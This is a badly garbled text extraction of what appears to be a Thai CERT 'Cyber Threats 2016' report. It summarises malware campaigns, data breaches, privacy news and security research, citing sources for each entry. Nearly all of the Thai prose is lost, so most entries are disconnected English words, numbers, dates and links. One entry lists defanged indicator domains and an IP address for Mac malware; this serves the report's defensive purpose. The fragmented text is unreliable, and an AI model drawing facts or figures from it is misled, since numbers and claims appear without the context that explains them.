Trend Micro 6. OTP
BKDR_MANGIT.SM
OTP
9 7. OTP

8,800

600 10

OTP SMS
1.

SMS
2.
SMS

3.

Google Play Store Apple Store
4.

5.

: 21/06/2559
: Bleeping Computer <http://thcert.co/qtxD5m>
238
Facebook

- .js .vbs
Facebook

- Windows
Scrip Host
(https://
technet.microsoft.com/en-us/library/
( https:// ee198684.aspx)
www.thaicert.or.th/alerts/user/2016/
-
al2016us001.html)

Facebook - Facebook
JavaScript (.js)

-
Facebook (https://
www.facebook.com/settings?tab=ap-
plications)
-

Facebook

: 28/06/2559
: Hackread <http://thcert.co/RSzuEm>,
StackExchange <http://thcert.co/MvFl54>
CYBER THREATS 239
2016

Office 365
22 2559

Microsoft Office 365 Macro
57%
Microsoft Office 365
Dridex
Cerber

Enable
Content Macros

Cerber

500
: 28/06/2559
: Avanan <http://thcert.co/ftSo2G>,
The Register <http://thcert.co/bpAycH>
240
LevelDropper
Play Store root

Android root Store

Godless
Google Play Store
Android root
LevelDropper Google Play
Store
Android
6.0
Android
root 6.0
Android

root

Google Play
: 28/06/2559
: Lookout <http://thcert.co/MEFVEN>
CYBER THREATS 241
2016
Avast
Retefe
HTTPS

JavaScript

HTTPS
Proxy

HTTPS
: 29/06/2559
: Help Net Security <http://thcert.co/dYYr2z>
242
Hummer Android
35,000 root
Cheetah Mobile
Android
Hummer
root Android
root

Hummer
150,000
9
35,000 Android root

root Android
6.0
Factory Reset Android
6.0
Android

500,000
: 01/07/2559
: Help Net Security <http://thcert.co/YXA5vO>,
Cheetah Mobile <http://thcert.co/kUdcRz>
CYBER THREATS 243
2016
Mac

BitDefender Mac
Eleanor (Backdoor.
MAC.Eleanor) App Store
Backdoor

Mac
EasyDoc Converter

Tor

: 06/07/2559
: BitDefender <http://thcert.co/OCs4jU>
244
Keydnap Mac

ESET Tor,
Keydnap Mac OS X
Keychain

Keydnap

.zip Gatekeeper

.jpg .txt
(Unix
executable)
space ( Mac OS X
screenshot.jpg screenshot.
jpg)
Mac OS X

Terminal

backdoor

: 08/07/2559
: We Live Security <http://thcert.co/cgF5Qy>
CYBER THREATS 245
2016

Pokemon GO
Pokemon GO Pokemon GO
Android iOS

2559

Play Store App Store
Play Store
App Store
Proofpoint
Pokemon GO Android
Backdoor Droidjack

: 11/07/2559
: Proofpoint <http://thcert.co/TvdV5P>
246
Ranscam

Talos
Ranscam

(https://www.facebook.com/
thaicert/videos/657180994430037/)

Ranscam

: 14/07/2559
: Talos <http://thcert.co/IG7Xgh>
CYBER THREATS 247
2016
Europol

Europol

Shade
Intel Security, Kaspersky
Lab Intel Security
No More Ransom Kaspersky Lab
(https://www.nomoreransom.org)

: 26/07/2559
: Help Net Security <http://thcert.co/UrAztL>
248
Microsoft
..WSF ( . 2 )
Microsoft
Nemucod .ZIP
.WSF .
( (
) Nemucod spreadsheet_1529..wsf)
.ZIP

.ZIP .WSF
.. .WSF
.WSF (Windows Scripting
File)
JavaScript VBScript

Windows Scripting Host

: 28/07/2559
: The Register <http://thcert.co/xnpCt9>,
Microsoft <http://thcert.co/czD4Ql>
CYBER THREATS 249
2016
SpyNote
Android
Palo Alto Networks Palo Alto Networks

SpyNote
Remote Access Trojan (RAT)
Android

root

: 02/08/2559
: Threatpost <http://thcert.co/o2f1nF>,
Palo Alto Networks <http://thcert.co/GXRBEv>
250
FossHub
Audacity Classic Shell
FossHub (http://www.fosshub. MBR

com/) 2
Freeware Open
Source 2559
Cult of FossHub
Peggle (https://twitter.com/Cultof-
Peggle) Audacity
FossHub Classic Shell FossHub

Audacity
Classic Shell FossHub

: 04/08/2559
: Softpedia <http://thcert.co/tUYnn1>,
Audacity <http://thcert.co/erqT1S>
CYBER THREATS 251
2016
Google Play Store

155 2.8
Dr.Web Dr.Web

Android Google Play Store (SDK) SDK
155
Android.Spy.305
2.8

MaxMitek Inc, Fatty Studio,
Spyware Gig Mobile, TrueApp Lab, Sigourney
Studio, Doril Radio.FM, Finch Peach
Google Mobile Apps Mothrr Mobile Apps
IMEI

: 04/08/2559
: Softpedia <http://thcert.co/9TSk71>,
Dr.Web <http://thcert.co/0RfGlK>
252

Shortcut
Properties shortcut)
shortcut

- executable shortcut
.exe, .com, .scr shortcut

- .docx, .pdf
shortcut
- .js, .vbs

Target shortcut

cmd.exe (Command Prompt
Sophos Windows)
shortcut .js

shorcut
.lnk shortcut
shortcut shortcut
Properties
Windows shortcut
shortcut
(
Target shortcut

CYBER THREATS 253
2016

: 05/08/2559
: Naked Security <http://thcert.co/jiDu8c>
254
Cerber

2559 Cerber
Cerber
.cerber2 ( .cerber)

Cerber
2559 Cerber

Trend Micro

Cerber

: 08/08/2559
: Softpedia <http://thcert.co/WyIwAo>,
Fuzzer <http://thcert.co/CPyDIU>
CYBER THREATS 255
2016
Svpeng Android
Google AdSense
Kaspersky )
Svpeng
Android SMS

Google
AdSense

Android Device Administrator
Google AdSense (
) Factory Reset

Android
.apk Google AdSense

.apk ( https://
www.thaicert.or.th/papers/gener-
al/2014/pa2014ge004.html)
Android
Device
Administrator (

: 17/08/2559
: Business Insider <http://thcert.co/XHpCUY>,
SecureList <http://thcert.co/DXUFO1>
256
FireEye

2559
Locky
.DOCM
Microsoft Word
Macro 2559

88%
2559
FireEye
Locky
2559 17,000

: 23/08/2559
: FireEye <http://thcert.co/qBO5iH>,
ZDNet <http://thcert.co/00itos>
CYBER THREATS 257
2016
Rex Linux
Bitcoin DDoS

Stormshield Dr.Web
Rex

Linux Rex
CMS Drupal
Wordpress - Stopmshield (https://thisisse-
curity.net/2559/08/17/from-website-
locker-to-ddos-rex/)

Bitcoin - Dr.Web (http://vms.drweb.com/
(Command & Control) virus/?_is=1&i=8436299)
DDoS
Drupal : 23/08/2559
: Softpedia <http://thcert.co/q6PZMr>
CVE-2014-3704
(Drupalgeddon) SQL
Injection

Wordpress

CMS
Magento
258
Wildfire

Wildfire No More Ransom

Europol

.wflx
1.5
Bitcoin 3

Wildfire

No More Ransom (https://www.no-
moreransom.org/decryption-tools.
html)
1

136 Bitcoin
2.7
: 26/08/2559
: ZDNet <http://thcert.co/lBf7di>
CYBER THREATS 259
2016
Pegasus iOS

iOS 9.3.5 !
25 2559 Pegasus
Apple iOS 9.3.5 NSO Group
3
iOS
Pegasus
Pegasus iOS 3
CVE-2016-4655, CVE-2016-4656
CVE-2016-4657 3
2559
Citizen Lab Lookout

Lookout Pegasus

Pegasus
iOS

3
GPS Apple Apple
iOS 9.3.5
iOS

: 26/08/2559
: Citizen Lab <http://thcert.co/wEcu2J>,
Lookout <http://thcert.co/jmDSgf>
260
Locky
DLL
Locky .zepto ( Zepto

2558 Locky) (
)

2559
.DLL

.ZIP
.DLL JavaScript Windows Script
.DLL Host
JavaScript VBScript
Windows Explorer
JavaScript Microsoft (https://
JavaScript technet.microsoft.com/en-us/library/
.DLL ee198684.aspx)
Process

: 29/08/2559
: Softpedia <http://thcert.co/xeHRkS>,
Cyren <http://thcert.co/90bSdG>
CYBER THREATS 261
2016
Transmission ()
Keydnap Mac OS X
28 2559
transmissionbt.com
Transmission

Linux (
Mac OS X http://transmissionbt.com/
Transmission keydnap_removal/)
2.92

Transmission
Transmission
Keydnap 6 2559
KeRanger
Transmission

Transmission

hash
: 31/08/2559
: We Live Security <http://thcert.co/KXJyXg>,
Transmission <http://thcert.co/3p60wY>
262
DressCode Google Play Store

Botnet
CheckPoint
Android Google
40 Google
Play Store Play Store
DressCode Android

DressCode
Google Play Store
2559
2
Botnet

: 01/09/2559
: Softpedia <http://thcert.co/eqyiz7>,
CheckPoint <http://thcert.co/gphLgW>
CYBER THREATS 263
2016
Cerber
Trend Micro
2559 Cerber Cerber 3.0
3.0

.cerber3
.cerber2

: 01/09/2559
: Trend Micro <http://thcert.co/1zw6V3>,
Bleeping Computer <http://thcert.co/iwhWq9>
264
Gugi
Android 6
Kaspersky
Android Gugi

drawing over other
Android 6 apps Gugi

SMS

device
administrator

Google Play
SMS Android 6
(permission)
(command & control) SMS

Android 6

(Marshmallow) Google

CYBER THREATS 265
2016
Gugi
Gugi 2558 Gugi

2559

Gugi

safe mode (
power Play Store
safe mode
)
: 07/09/2559
: Kaspersky <http://thcert.co/dB2lPz>
266

NAS Seagate
Sophos
Mal/Miner-C
Monero ( Bitcoint
(cryptocurrency) ) Sophos
NAS
17,000
Sophos NAS
NAS Seagate Seagate Central
Seagate Central

7,000
( 70%
) Sophos NAS

Photo.scr

: 13/09/2559
: Sophos <http://thcert.co/VZZxxq>
CYBER THREATS 267
2016
iOS 75
App Store
Trend Micro

iOS Haima
(adware)
iOS
75

Haima IMEI IP

enterprise App
App Store Store

iOS
App Store

()

: 14/09/2559
: Softpedia <http://thcert.co/dEVqKg>,
Trend Micro <http://thcert.co/jrQEIV>
268
.hta

Malwarebytes

.hta

.hta (HTML Application)
HTML
Internet Explorer

.hta
VBScript
JavaScript

.hta

PowerShell

Kovter Cerber
: 15/09/2559
: Malwarebytes <http://thcert.co/gqpJPC>
CYBER THREATS 269
2016
Guide for Pokemon GO Play Store

root
Kaspersky
Android Android root
Guide for Pokemon GO
Google Play Store

Pokemon Go root

Kaspersky
Google
500,000 Play Store

Google Play

: 15/09/2559
: Softpedia <http://thcert.co/j1w54c>
270
Komplex Mac OS X

Palo Alto Networks PDF

Komplex
Mac OS X

(aerospace industry)

MacKeeper Komplex
Remote Code
Execution
(
)

3
Sofacy Group

Mac OS X
(
MacKeeper )

IP
PDF

CYBER THREATS 271
2016
- appleupdate[.]org - itunes-helper[.]net
- apple-iclouds[.]net - 185.10.58.170
: 27/09/2559
: PC World <http://thcert.co/5acxiQ>,
Palo Alto Networks <http://thcert.co/N7do2J>
272
Xiny Android Play Store

root
Dr.Web root
Xiny Android
Xiny root
Android Google
Play Store (
) root
(inject)

Google Play Store
steganography

Xiny
Device Android
Administrator

(
)
Xiny
: 28/09/2559
: Graham Cluley <http://thcert.co/OmtfLQ>,
Dr.Web <http://thcert.co/MNAVVt>
CYBER THREATS 273
2016
MarsJoke
96
Proofpoint

0.7 Bitcoins
22 2559 (320 10,000
)
96

file_6.exe
MarsJoke

: 28/09/2559
: ZDNet <http://thcert.co/xMbD3Y>
274

Xpan remote desktop
Kaspersky
remote desktop
Xpan Kaspersky

http://
TeamXRat support.kaspersky.com/

Kaspersky
brute force remote desktop

remote desktop brute force

brute force

.___xratteamLucked

1 bitcoin (
20,000 )
: 30/09/2559
: Softpedia <http://thcert.co/uPInia>,
Kaspersky <http://thcert.co/sk3HNz>
CYBER THREATS 275
2016
Mirai IoT
DDoS
Brian Krebs backdoor

Mirai
botnet
IoT
IoT (Internet of Things)
DDoS

DDoS

Mirai

IoT

: 03/10/2559
: Krebs on Security <http://thcert.co/hW8G1i>,
Dr.Web <http://thcert.co/Xb4uxK>
276
Cerber
4
2559
Cerber Cerber

.cerber3
4
( .b71c)
README.hta

Cerber

( MySQL, Microsoft SQL)

: 07/10/2559
: Bleeping Computer <http://thcert.co/7q2rR3>
CYBER THREATS 277
2016
Symantec Odinaff
macro
Symantec Symantec
Odinaff
SWIFT

2559 3

Microsoft Office macro Symantec

mac-
ro

: 12/10/2559
: Symantec <http://thcert.co/votZ7X>
278
NyaDrop
IoT Linux
Malware Must Die

honeypot (
NyaDrop IoT
Linux )

IoT

DDoS
proxy
IoT CPU MIPS 32 bit IoT
( , DVR, )

: 17/10/2559
: Softpedia <http://thcert.co/Ko6Np2>,
Malware Must Die <http://thcert.co/bpM7gb>
CYBER THREATS 279
2016
Mirai
Sierra Wireless
Sierra Wireless
Aircard, 3G Wi-Fi Sierra Wireless LS300,
GX400, GX/ES440, GX/ES450
RV50
Mirai
Sierra Wireless (http://
source.sierrawireless.com/~/media/
support_downloads/airlink/docs/
Mirai technical%20bulletin/sierra%20
(Internet of wireless%20technical%20bulle-
Things - IoT) tin%20-%20mirai%20-%204oct2016.
ashx?la=en)

Mirai
DDoS
: 18/10/2559
: ZDNet <http://thcert.co/OE07nY>,
ICS-CERT <http://thcert.co/TGlmmd>
280
Microsoft
Locky .LNK
Microsoft
Locky shortcut
.ZIP Sophos

.LNK cmd.exe
shortcut
(downloader)

shortcut ( .LNK)
Target shortcut
PowerShell

: 20/10/2559
: Microsoft <http://thcert.co/ZwTiMS>
CYBER THREATS 281
2016
Google AdWords
macOS

macOS (

macOS)
( )
Google AdWords
keyword OSX/InstallMiez

Google
25 2559

keyword Google AdWords
Google Chrome macOS

Google Chrome
Google

Google Chrome
: 02/11/2559
: Cylance <http://thcert.co/DylziN>
282
Svpeng Google Chrome

Android .apk
2559 Kaspersky .apk

Svpeng Android Google Chrome Android

Google Google Google
AdSense AdSense
Google Chrome
0-day Google 55 ( Google
Chrome Android Chrome 54)
.apk Android

2559
Kaspersky
Svpeng 318,000

JavaScript
.apk 1,024

.apk
.apk

: 08/11/2559
: Ars Technica <http://thcert.co/hXGhKz>,
Best Security Search <http://thcert.co/S1w5lR>,
Securelist <http://thcert.co/Jpb5Nd>
CYBER THREATS 283
2016
Mirai (DVR)
Mirai

(
Mirai DDoS )
1 Tbps

IoT
IoT
IoT

(CCTV) Mirai IoT

(DVR) https://www.thaicert.or.th/papers/
general/2016/pa2016ge001.html
: 21/11/2559
: The Register <http://thcert.co/Mo4eUj>,
Pen Test Partners <http://thcert.co/yj6eCv>
284

Facebook

Facebook
Facebook .svg
.svg Nemucod Locky

Facebook

.svg
JavaScript

.svg

(extension)
Google Chrome Facebook https://
Facebook www.thaicert.or.th/alerts/user/2016/
.svg al2016us001.html

: 22/11/2559
: The Hacker News <http://thcert.co/5iNVor>,
Blazes Security Blog <http://thcert.co/mIx4lo>
CYBER THREATS 285
2016
Keygen
Symantec Symantec
Gatak
Stegoloader

Keygen

Keygen

SketchList3D,
BobCAD-CAM, Siemans SIMATIC STEP 7,
CadSoft Eagle Professional,
Manctl Skanect Keygen

: 28/11/2559
: Beta News <http://thcert.co/r3NZ5I>,
Security Week <http://thcert.co/VoEeQp>,
Symantec <http://thcert.co/cL87hs>
286
Gooligan Android
root Google Account
Check Point
Gooligan Google

Android
root

Google 2559 Android
1

Check Point
Google
Play
Store

https://gooligan.checkpoint.
root com/
VROOT (CVE-2013-6282)
Towelroot (CVE-2014-3153)
root Android 4-5 factory reset

root

(inject)
Google Play Google
Mobile Services
Google
: 01/12/2559
: Check Point <http://thcert.co/7uG9xx>
CYBER THREATS 287
2016
Android
Dr.Web 7 MID, Explay Imperium 8, Perfeo

Android 9032_3G, Prestigio MultiPad Wize
3021 3G, Prestigio MultiPad PMT5001
. 3G, Ritmix RMD-1121, Oysters T72HM
3G, Irbis tz70, Jeka JK103

Android.
DownLoader.473.origin Android.
Sprovider.7 Dr.Web
17/12/2559
Lenovo A319, Lenovo A6000, Lenovo

MegaFon Login 4 LTE, Bravis NB85,
Bravis NB105, Irbis TZ85, Irbis TX97,
Irbis TZ43, Irbis tz56, Pixus Touch A6000
7.85 3G, SUPRA M72KG, SUPRA
M729G, SUPRA V2N10, Itell K3300, http://www.lenovomobileth.com
Digma Plane 9.7 3G, General Satellite
GS700, Nomi C07000, Optima 10.1
3G TT1040MG, Marshal ME-711,
: 14/12/2559
: The Hacker News <http://thcert.co/9rck6w>,
Dr.Web <http://thcert.co/aegbz0>
288
Super Mario Run Android

15 2559
Nintendo Super Mario
Run iOS Pokemon GO

Android Play Store

Super Mario
Super Mario Run
.apk
SMS
GPS

: 23/12/2559
: Hackread <http://thcert.co/SqgASH>,
Trend Micro <http://thcert.co/STQDth>
290
Privacy
CYBER THREATS 291
2016
FBI Apple iOS
Apple
FBI Apple
iPhone Backdoor
iPhone Apple
iOS
Data Protection
Apple FBI
FBI Data Protection
Apple (Backdoor) iOS 8 Passcode

Apple (Passcode)

FBI Apple
: 18/03/2559
: The Hacker News <http://thcert.co/WzJDSt>
292
Home Depot 19.5

Home Depot

2557
50 Home Depot

19.5 43
Call Center
10,000
: 25/03/2559
: ThreatPost <http://thcert.co/e1ET4T>
CYBER THREATS 293
2016
QQ Browser
Citizen Lab
QQ Browser
QQ Browser
Tencent Android
Windows, Mac, .apk
iOS Android man-in-the-

middle .apk

QQ Browser Windows

.exe
QQ Browser Android
Windows
IMEI, IMSI, Wi-Fi
, ,

, 2559 Tencent
, QQ Browser
QQ
Browser
: 31/03/2559
: Citizenlab <http://thcert.co/RBlK18>
294
CNBC

CNBC
CNBC
Google Docs

CNBC

HTTP

Google Docs

: 31/03/2559
: BGR <http://thcert.co/ycb4d0>
CYBER THREATS 295
2016
50
6 2559
2551
50
- (80 )

: 07/04/2559
: Wired <http://thcert.co/qXnZ7Q>
296
27 2559

Web Defacement 9

1.3

15.8
2553
: 08/04/2559
: Trend Micro <http://thcert.co/zdEcvF>
CYBER THREATS 297
2016

Privacy International

2544
(MI5, MI6 GCHQ) Investigatory Powers

: 22/04/2559
: Ars Technica <http://thcert.co/3Tb9aK>
298
VPN Opera
Proxy
Opera 2558)
Proxy
VPN
Michal Spacek

VPN Proxy Opera
Proxy
Opera
VPN Opera VPN
api.surfeasy.com (
VPN Opera
: 25/04/2559
: Help Net Security <http://thcert.co/CW1HdS>
CYBER THREATS 299
2016

93.4
Amazon Web Service
(AWS) 2558
15.8

50

AWS

Amazon
: 25/04/2559
: Network World <http://thcert.co/UuQvnR>
300
1.5 GB
SQL injection
(Qatar
National Bank QNB)
1.5 GB
SQL injection

: 29/04/2559
: Security Affairs <http://thcert.co/T06850>,
BTimes <http://thcert.co/PkVrhH>
CYBER THREATS 301
2016
Facebook 2558
13%
6
Facebook 3
3
Facebook
(Transparency report) (https://govtrequests.facebook.
Facebook com/country/Thailand/2015-H2/)

2015
46,763
6 2558
13% 60%
: 29/04/2559
: The Register <http://thcert.co/Umz1OH>
302
Telegram
SMS OTP
2 (2- Telegram
step verification) SMS OTP

29 2559
SMS
Telegram
SMS
(One Time
Password - OTP) SMS

SMS Telegram

log Telegram
IP

Telegram

2559
Telegram
: 02/05/2559
: Bellingcat <http://thcert.co/DYRuoC>
CYBER THREATS 303
2016
NHS
1.6 Google AI
New
Scientist
Google
NHS (National Healthcare System) (Opt-in)
Google
1.6 (Opt-out)
Streams

HIV Google

: 02/05/2559
: The register <http://thcert.co/LKP2YR>
304
Google, Yahoo, Microsoft 272

Alex Holden

Mail.
ru, Google, Yahoo Microsoft
272.3

Mail.ru Microsoft

2 (2-Factor
Google Authentication)
Yahoo SMS

Google, Yahoo Microsoft

2
(https://www.thaicert.or.th/papers/
general/2015/pa2015ge001.html)
: 06/05/2559
: Reuters <http://thcert.co/GgAHKF>
CYBER THREATS 305
2016
Twitter
Dataminr

Twitter Twitter

Dataminr
Twitter Dataminr

NSA
John C. Inglis
NSA Twitter

NSA
: 10/05/2559
: CSO <http://thcert.co/cQY4fD>
306
Runkeeper

Norwegian Consumer
Council (NCC) Fitness-
Keeper Runkeeper

GPS

Runkeeper Runkeeper

Runkeeper
: 17/05/2559
: Help Net Security <http://thcert.co/vChkvI>
CYBER THREATS 307
2016
! LinkedIn
2555
2555 LinkedIn LinkedIn

LinkedIn LinkedIn

2559
LinkedIn 2555
: 19/05/2559
: Smart Company <http://thcert.co/Me51YB>
308
LinkedIn
123456
18 2559 LinkedIn
LinkedIn
LinkedIn
100
LinkedIn
LinkedIn
2555

Leaked Source 2
(2-Factor Authentication)
5 123456, linkedin,
password, 123456789 12345678

: 23/05/2559
: LinkedIn <http://thcert.co/mp6gTX>,
Leaked Source <http://thcert.co/y0FtV0>
CYBER THREATS 309
2016
Anonymous
33

Anonymous

33

SQL Excel 10 DDoS

: 24/05/2559
: Softpedia <http://thcert.co/QshRPx>
310
Facebook
Facebook Facebook

Google, Twitter

Facebook
2
Facebook

Facebook Twitter
https://twitter.com/privacy

Facebook
Titan https://www.facebook.com/policy.
URL php

Google

https://privacy.google.com/da-
ta-we-collect.html
: 24/05/2559
: The Hacker News <http://thcert.co/O3ZjFp>
CYBER THREATS 311
2016
Tumblr

Tumblr Tumblr

Tumblr 2
2556 (2-Factor Authentication)

65 Tumblr (https://www.tumblr.com/
docs/en/account_security)

Have I been
pwned?

Tumblr
https://haveibeenpwned.com
: 31/05/2559
: Motherboard <http://thcert.co/Pf1OKh>
312

FBI
2559
LinkedIn, Tumblr
MySpace

FBI
FBI

( 2 5 Bitcoin
38,000 95,000 )

: 03/06/2559
: FBI <http://thcert.co/3IhlBU>
CYBER THREATS 313
2016
TeamGhostShell
MongoDB 36
TeamGhost-
Shell
MongoDB MongoDB
NoSQL

MongoDB

Security Checklist
MongoDB (https://docs.mongodb.
com/manual/administration/secu-
rity-checklist/)

: 06/06/2559
: Hackread <http://thcert.co/AL9Jgf>
314
Facebook Netflix

LinkedIn, Tumblr
MySpace

Facebook Netflix

2

Adobe
3 Facebook

: 08/06/2559
: ZDnet <http://thcert.co/wahIwQ>
CYBER THREATS 315
2016
Flash Keyboard Play Store

Pentest
Flash
Keyboard Google
Play Store
Flash Keyboard

Flash Keyboard
Android
DotC United (http://www.dotcunit-
ed.com/flashkeyboard.html)

50
https://regmedia.co.uk/2016/06/07/
pentestflashkeybpardpaper.pdf

GPS SMS

( )

IMEI

316
SMS
Settings

Android 6.0
: 09/06/2559
: The Register <http://thcert.co/LWUXn4>
CYBER THREATS 317
2016
GitHub
2FA
GitHub
GitHub
14
2559
GitHub GitHub

2

GitHub (https://help.github.
com/articles/providing-your-2fa-au-
thentication-code/)
: 16/06/2559
: GitHub <http://thcert.co/TdrlfS>
318
Mark Zuckerberg

Mark Zuckerberg
Facebook
Facebook

Spyware

: 22/06/2559
: The Next Web <http://thcert.co/8XQzO0>
CYBER THREATS 319
2016
LogMeIn

LogMeIn
(accounts.logme.in)

LogMeIn
Remote Desktop
2

: 22/06/2559
: Help Net Security <http://thcert.co/zyfVqf>
320

154

154 2558

2

()

L2

: 24/06/2559
: Naked Security <http://thcert.co/Lnna1R>,
The Daily Dot <http://thcert.co/P8wCcM>
CYBER THREATS 321
2016
Google
Google
Google

(https://privacy.google.com/
data-we-collect.html)

Google Privacy Checkup (https://myaccount.
google.com/privacycheckup/)

2559

Google
My Activity (https://myactivity.
google.com/myactivity)

: 01/07/2559
: Life Hacker <http://thcert.co/toDIKj>
322
22

Catholic Health Care

Services
650,000
( 22 )

: 14/07/2559
: iMedicalApps <http://thcert.co/7a1MPw>
CYBER THREATS 323
2016
Maxthon Browser
Maxthon Browser Maxthon Browser

CEO
Maxthon Browser

Maxthon Browser

Google Maxthon
Browser

Maxthon Browser

Exatel

: 15/07/2559
: Softpedia <http://thcert.co/ggYSZD>
324
EFF

Electronic Frontier Foundation
(EFF) PDF

Operation Manul

Remote
Access Trojan (RAT) Bandook
JRat
(Spear Phishing)

: 05/08/2559
: Softpedia <http://thcert.co/LSsfmk>,
EFF <http://thcert.co/U7YYXL>
CYBER THREATS 325
2016
Dota 2
2
Dota 2 (http://dev.
dota2.com) vBulle-
Dota 2 tin LeakedSource

10 80%
2559
IP
2 Dota 2

: 10/08/2559
: ZDNet <http://thcert.co/OsDcih>,
LeakedSource <http://thcert.co/r4TbZf>
326
Minecraft World Map

71,000
Minecraft World Map (http:// Minecraft
www.minecraftworldmap.com/) World Map
Minecraft
29 https://haveibeenpwned.com/
2559

2559

71,000
: 31/08/2559
: The Register <http://thcert.co/0mdOol>
CYBER THREATS 327
2016
Dropbox 60
31 2559 Dropbox Dropbox

Dropbox
60 ( https://haveibeenpwned.com/
)

Dropbox
Dropbox 2555

Dropbox
Dropbox
2555 2

Dropbox (https://
www.dropbox.com/en/help/363)
: 31/08/2559
: TechCrunch <http://thcert.co/yfqm8N>,
The Register <http://thcert.co/FdMOpl>
328
Seagate

Seagate
social engineering
14 2559

2559
Seagate
CEO
W-2
Seagate

10,000

: 13/09/2559
: Softpedia <http://thcert.co/QHS9lJ>
CYBER THREATS 329
2016
Yahoo 500
22 2559 Yahoo
Yahoo

500
2557
Yahoo
2

( bcrypt) SMS

Yahoo general/2015/pa2015ge001.html)

: 23/09/2559
: CNN <http://thcert.co/4M4pOu>,
Yahoo <http://thcert.co/HmcS5u>
330
Dropbox 60

2559
Dropbox
Dropbox 60 2
Dropbox (https://
www.dropbox.com/en/help/363)

(
)

Dropbox
2557

: 05/10/2559
: Hackread <http://thcert.co/dqsdel>
CYBER THREATS 331
2016
Dailymotion
85
Dailymotion
Dailymotion
85.2 20 2559
Dailymotion
18.3

: 06/12/2559
: ZDNet <http://thcert.co/RWHWu5>
332
Research & Education

CYBER THREATS 333
2016

VR

3
University of Stuttgart,
Saarland University Max Planck 97%
Institute for Informatics

: 21/04/2559
: Gizmodo <http://thcert.co/UTM7q7>
334

2559
University of West Florida
Virginia Department of Education

: 20/06/2559
: University of West Florida <http://thcert.co/FIm2IY>,
WSET <http://thcert.co/zR5nxg>
CYBER THREATS 335
2016
KeySniffer

Bastille KeySniffer

Bluetooth
10 Logitech, Dell Lenovo

Bluetooth

2553
Anker, EagleTec, General Electric, KeyKeriki 2558
Hewlett-Packard, Insignia, Kensing- KeySweeper
ton, Radio Shack, Toshiba
100
250
76
: 28/07/2559
: Security Affairs <http://thcert.co/CHS9iM>,
KeySniffer <http://thcert.co/w0wQOP>
336

/
Princeton University

HTML5 API

Firefox
VPN
Chrome

: 05/08/2559
: The Guardian <http://thcert.co/rKxJq8>,
IACR <http://thcert.co/bM1ifR>
CYBER THREATS 337
2016
Carnegie
Mellon

Passphrase

16-64

NIST
(National Institute for Standards
and Technology)

60-90

Password Manager KeePass
P@ssw0rd1
P@ssw0rd2

: 15/08/2559
: Washington Post <http://thcert.co/U7x4Yl>
338
white-hat hacker
100
The Japan News
(The
Internal Affairs and Communications 25
Ministry) 1
2560
white-hat
hacker

(cyber drill)
2

100

(National Institute
of Information and Communications
Technology NICT)

: 06/09/2559
: The Japan News <http://thcert.co/gD44Lp>
CYBER THREATS 339
2016
CrowdStrike

-

-

-
cloud

-

: 06/09/2559
: CrowdStrike <http://thcert.co/XrgrPR>
340
F-Secure Helsinki

F-Secure
Helsinki
()
Cyber Security Base with
F-Secure

2558
25
2559
209,000 2562 (http://
mooc.fi/courses/2559/cybersecurity/)
1.5
Cyber Security Base
with F-Secure

: 14/09/2559
: Voice & Data <http://thcert.co/saPW4E>
CYBER THREATS 341
2016
iPhone 5c
iOS iPhone
( NAND Chip)

10 9

2559 FBI
iPhone 5c iPhone 5c

FBI
Apple iOS

3,000

Apple 40 PIN 4

6
iPhone 5c
( iPad iPhone
https://www.youtube.
com/watch?v=tM66GWrwbsY)
(http://
arxiv.org/abs/1609.04327)
: 21/09/2559
: Threat Post <http://thcert.co/wFX3yh>,
Ars Technica <http://thcert.co/UHA50H>,
CNN <http://thcert.co/1rjJsJ>
342
Europol
2559
Europol ATM
NFC

2559 Internet Organised 5.
Crime Threat Assessment
8

6. Darknet
1.
(Crime-as-Service)

7. social

engineering

CEO fraud
2.

3. 8. Bitcoin

4.

CYBER THREATS 343
2016
: 29/09/2559
: Help Net Security <http://thcert.co/GOv7KZ>,
Europol <http://thcert.co/io7ntU>
344

(NCSC) 700
NCSC

(National Cyber Security (Bank of England)
Centre NCSC)

(critical infrastructure)

700
Ciaran Martin

GCHQ CEO NCSC
: 03/10/2559
: Security Affairs <http://thcert.co/wOCfPb>
CYBER THREATS 345
2016
University of Wash-
ington

(
Bluetooth Wi-Fi)

50
25
: 05/10/2559
: Engadget <http://thcert.co/M30rLs>,
University of Washington <http://thcert.co/iBHgeS>
346

Smart Nation
10 2559

4 (National Cybercrime Action Plan)

2559

(Cyber
Security Agency of Singapore - CSA)

(National Cyber Incident Cyber
Response Team) Security Associates and Technologists
(National (CSAT)
Cyber Security Centre) 3

(Cybersecurity 6
Act) 2560

CYBER THREATS 347
2016
: 10/10/2559
: Channel News Asia <http://thcert.co/zU5PGt>
348
Singtel
cybersecurity
-
(National University of Singapore
NUS) Singtel (Internet of Things and industrial
control systems)

(NUS-Singtel Cyber -
Security Research and Development (cyber-
Laboratory) security systems based on quantum
technology)

30

4
5
- 100 NUS
(data and cloud security) Singtel

- 120
(predictive security analytics)
: 28/10/2559
: ZDNet <http://thcert.co/jUxQwJ>
CYBER THREATS 349
2016
CPU
machine learning
Binghamton University

CPU

National Science Foundation
275,000
3
CPU
machine learning
CPU

: 09/11/2559
: Phys.org <http://thcert.co/qgxp3h>,
Binghamton University <http://thcert.co/aoEXVX>
350

Phillips Hue

Phillips Hue

ZigBee (Internet
(symmetric key) of Things IoT)

400

Phillips

Phillips Hue

: 14/11/2559
: The Register <http://thcert.co/VGLitA>,
<http://iotworm.eyalro.n net>
CYBER THREATS 351
2016
IBM
IBM X-force Incident

Response and Intelligence Services

153,000

1

DDoS

(Internet of Things
IoT) Cloud

: 21/11/2559
: Threatpost <http://thcert.co/XyvGFC>
352

(
YouTube https://www.youtube.com/
watch?v=ez3o8aIZCDM)

RealTek

Ben Gurion

RealTek

: 25/11/2559
: Wired <http://thcert.co/E4eA1D>,
<http://thcert.co/L2nUFH>
CYBER THREATS 353
2016
Malaysian Digital Economic

Corporation (MDEC) Protection
Group International (PGI)

(Cybersecurity
Academy)

2 2562

UK-APAC Centre of Security
Excellence

Government
Communication Headquarters (GCHQ)
: 13/12/2559
: Infosecurity Magazine <http://thcert.co/jJAUBm>,
Hakin9 <http://thcert.co/DeKvq6>
354
NIST NSRL

15 2559 NIST
(digtal forensics) Android
iOS 23,000
NSRL
(data reduction) 200,000

(
)
(hash)

RDS Hashsets
NIST (http://
www.nsrl.nist.gov/)

National Software Reference Library
(NSRL) NIST
RDS Hashsets

: 19/12/2559
: CSO <http://thcert.co/nC3TzT>,
NIST <http://thcert.co/56Jcdg>
CYBER THREATS 355
2016
356
Statistics
CYBER THREATS 357
2016
2558
Star Wars
SplashData

2558
1 2 123456
password

Star Wars
starwarssolo
princess
: 20/01/2559
